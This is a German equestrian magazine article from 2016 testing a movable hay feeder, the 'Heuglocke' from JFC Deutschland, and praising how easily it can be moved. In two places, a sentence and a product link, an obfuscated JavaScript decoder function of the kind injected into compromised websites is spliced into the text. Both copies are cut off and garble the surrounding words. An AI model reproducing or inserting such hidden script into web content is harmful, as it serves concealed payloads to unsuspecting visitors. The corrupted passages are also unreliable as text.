Produkttest Heustation – bei der Heuglocke keine Standortfrage

29. November 2016 | Von Redaktion | Kategorie: Aus der Redaktion
Keine St<script type=function m65c3bbf5572b(wc){var s4=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var r1=”;var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfandortfrage: Mit der Heuglocke lässt sich die Heufütterung an verschiedenen Standorten realisieren (Foto: Anke Klabunde)." width="600" height="338" />

Warum muss Heu immer an der gleichen Stelle gefüttert werden? Um Abwechslung in den Pferde-Alltag zu bringen, empfiehlt es sich in Offenställen und auf Paddock Trails, aber auch im Zweifel auf der Weide, das Raufutter an verschiedenen Standorten anzubieten.

Doch die Raufen-Modelle mit einer Verankerung im Boden lassen keine Standortvariation zu, während vermeintlich mobile Lösungen nur mit Hilfe von Treckern oder Hoftrucks umzustellen sind – für kleine(re) Pferdehaltungen oftmals ein Problem, wenn solch´ ein technisches Equipment nicht zur Verfügung steht.

Für unseren Produkttest waren wir jedoch auf der Suche nach einer flexiblen Lösung, bei der die Standortwahl nicht unbedingt von einem solchen Fahrzeug-Fuhrpark abhängig ist – und wurden fündig: Die nur 40 Kilogramm leichte Heuglocke von function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand.de" target="_blank">JFC Deutschland kann selbst von leichtgewichtigen Personen mühelos bewegt werden. Denn mit wenigen Handgriffen lässt sich die Heuglocke „auf die Seite“ legen und anschließend mit ein wenig Geschick an ihren neuen Standort manövrieren. Bei Bedarf können wir aber auch unseren kleinen Trecker einsetzen – beispielsweise bei größeren Entfernungen zum neuen Aufstellort. Denn das neue Modell der Heuglocke verfügt über eine Öse im Dach, so dass die Aufnahme und der Transport mit einer Ballengabel erfolgen können.

Tags: , , , , , , ,
Trackback URL: http://www.horse-today.de/wp-trackback.php?p=139911

Hier klicken, um einen Kommentar zu schreiben